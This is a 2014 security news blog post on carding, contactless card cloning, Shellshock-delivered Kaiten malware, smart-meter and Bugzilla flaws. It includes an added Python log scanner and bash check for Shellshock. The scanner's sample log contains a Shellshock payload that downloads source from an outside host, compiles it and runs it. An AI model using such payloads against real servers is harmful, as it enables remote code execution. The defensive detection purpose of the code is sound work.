Wednesday, October 8, 2014

A good (economic) cape covers everything (even digital ethics)

Few things have provoked as much writing as money. Benjamin Franklin said that "money never made a man happy yet, nor will it. The more a man has, the more he wants. Instead of filling a vacuum, it makes one." Voltaire also cared for our souls when he warned: "don't think money does everything or you are going to end up doing everything for money." And even the Castilian proverb "a good cape covers everything" warns us about it. The power of money lies in how it can change people, for better or worse.

In the digital world we find examples of both. For instance, bank fraud has evolved from being run in a very disorganized way a few years ago to being managed like a criminal enterprise today. Shops selling stolen bank details use the same techniques and trust seals as any legitimate e-commerce operator to boost buyer confidence. When you visit one of these websites, some of them reachable from anywhere on the Internet, you realize you are not looking at a dark portal run by crackers, but at a company that takes care of its customers.

On the other hand, researchers sometimes put the general interest before their own benefit and warn of alarming projects like Peter Fillmore's. It is an application written specifically for the Nexus 4 that can clone a particular type of contactless payment card used at Australian POS terminals. CyanogenMod, a popular Android ROM, was an essential part of the development, which also relies on an open source virtual card management gateway.

The Bash vulnerability known as Shellshock is still being exploited by the bad guys. Kaiten, a popular DoS tool controlled via IRC, has gained a new attack vector that takes advantage of this bug on OS X. Victims are attacked from a compromised legitimate website, which makes bash download the file containing the malware. To evade security systems, the malware arrives as source code and is compiled with gcc once it is on the device, rather than being shipped as a ready-made binary as is usual.
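The delivery chain described above, as an added example that is not code from this post, from Kaiten or from any vendor: a Python scanner that flags Shellshock probes in combined-format web server access logs (the payload travels in request headers such as User-Agent or Referer, which a CGI server exports to bash as environment variables) and lists the second-stage tools named in the payload, plus the classic one-line local bash check. The log lines, IP addresses, hostnames and paths are constructed for the example.

```python
"""Shellshock (CVE-2014-6271) triage helpers: a log scanner and a local bash check.
Added example, not code from the original post or from the malware it describes."""
import re
import subprocess

# Constructed sample access-log lines (combined log format), not taken from the post:
# line 1 carries a payload in the User-Agent that fetches C source, builds it with gcc
# and runs it (the source-then-compile delivery described above); line 2 carries a
# probe in the Referer; line 3 is a benign request.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Oct/2014:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'curl -o /tmp/k.c http://198.51.100.9/k.c; gcc /tmp/k.c -o /tmp/k; /tmp/k'"
203.0.113.9 - - [08/Oct/2014:10:02:12 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 233 "() { ignored;}; echo pwned" "Mozilla/5.0"
198.51.100.2 - - [08/Oct/2014:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9)"
"""

# Unpatched bash imports any environment variable whose value starts with "() {" as a
# function definition and keeps parsing past the closing brace, so whatever follows
# "};" runs when the shell starts. A CGI server turns request headers into variables
# such as HTTP_USER_AGENT and HTTP_REFERER, which is how the payload reaches bash.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
# Second-stage tooling typical of the fetch-source, compile, run delivery.
STAGE_RE = re.compile(r"\b(curl|wget|gcc|cc|chmod)\b")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def scan_line(line):
    """Return a dict describing the probe if the line carries a Shellshock payload, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = {}
    for field in ("req", "ref", "ua"):
        value = m.group(field)
        if SHELLSHOCK_RE.search(value):
            # Record which header carried the payload and which stage-two tools it names.
            hits[field] = sorted(set(STAGE_RE.findall(value)))
    if not hits:
        return None
    return {"ip": m.group("ip"), "request": m.group("req"), "fields": hits}


def scan_log(text):
    """Scan a whole log; returns one record per line that carries a payload."""
    return [r for r in (scan_line(line) for line in text.splitlines()) if r]


def bash_is_vulnerable(bash="bash"):
    """Classic local check. True = CVE-2014-6271 present, False = patched, None = no bash."""
    try:
        out = subprocess.run(
            [bash, "-c", "echo probe"],
            # Only a patched bash ignores the function body and its trailing command.
            env={"x": "() { :;}; echo vulnerable", "PATH": "/usr/bin:/bin"},
            capture_output=True, text=True, timeout=10,
        )
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in out.stdout


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print("local bash vulnerable:", bash_is_vulnerable())
```

On a real system feed an access log to scan_log(open(path).read()); on a patched host bash_is_vulnerable() returns False. The regex matches the original CVE-2014-6271 payload shape only; the follow-up variants (CVE-2014-7169 and later) used different tokens and need their own patterns, and a probe that returns 200 against a CGI path deserves a look at that host even when no stage-two tool is named.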

In the security sector there are still real hackers interested in making public the numerous security flaws in computer systems. Alberto Garcia and Javier Vazquez are two Spaniards who will present a guide to taking control of smart meters at Black Hat Europe next week. In theory, they could cause a power outage across an entire neighbourhood or raise its residents' bills.

Bugzilla probably sounds familiar to those of you who are developers. It is one of the most popular bug tracking systems on the market, and it is free. Right now this project, framed in Mozilla's open source philosophy, is not doing very well. A few months ago we learned that a significant share of its users' data had been compromised. Now it seems that a vulnerability in its code could let an attacker escalate privileges and manage permissions to reach the information he is after, which could wreak havoc on both the open source and the proprietary third-party projects that use it daily.

Everyone involved in developing a business technology project should remember that applying threat modeling in the testing phase is a healthy habit that is usually a bit of "fun" and, above all, has a positive effect on the project's margins. If every service had a threat testing process, information leaks would drop sharply, users' data would be more secure, confidence in these companies would rise significantly and they would be even more profitable.

Here you have six topics where computer security meets business; six themes that bring out both the good and the bad side of human beings; and a new excuse to discuss this exciting industry with you. Thank you!
